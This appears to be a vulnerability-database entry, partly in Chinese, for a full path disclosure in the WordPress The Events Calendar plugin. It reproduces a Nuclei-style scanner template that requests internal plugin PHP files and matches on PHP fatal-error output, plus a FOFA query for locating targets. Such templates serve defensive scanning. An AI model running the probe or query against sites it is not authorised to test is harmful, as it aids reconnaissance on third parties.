wp-the-events-calendar-fpd: WordPress The Events Calendar - Full Path Disclosure

日期: 2026-01-08 | 影响软件: WordPress The Events Calendar | POC: 已公开

漏洞描述

WordPress The Events Calendar plugin is vulnerable to full path disclosure via direct access to plugin files.

PoC代码[已公开]

id: wp-the-events-calendar-fpd

info:
  name: WordPress The Events Calendar - Full Path Disclosure
  author: ritikchaddha
  severity: low
  description: |
    WordPress The Events Calendar plugin is vulnerable to full path disclosure via direct access to plugin files.
  reference:
    - https://wordpress.org/plugins/the-events-calendar/
  metadata:
    verified: true
    max-request: 3
    vendor: developer
    product: the-events-calendar
    framework: wordpress
    fofa-query: body="/wp-content/plugins/the-events-calendar/"
  tags: wp,wordpress,wp-plugin,fpd,events-calendar,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/the-events-calendar/src/Tribe/Main.php"
      - "{{BaseURL}}/wp-content/plugins/the-events-calendar/src/Tribe/Admin/Admin.php"
      - "{{BaseURL}}/wp-content/plugins/the-events-calendar/common/src/Tribe/Main.php"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Fatal error", "the-events-calendar", "Uncaught Error:")'
        condition: and
# digest: 4a0a0047304502202f80aa3fd713cf847de6f1e5b4319d494724ed79d15149de8fedf7676d5a8408022100954b72f4cd3a57eddc0046b6c01c7569704bb0391e66f379bfd57afad55ac9fe:922c64590222798bb761d5b6d8e72950

相关漏洞推荐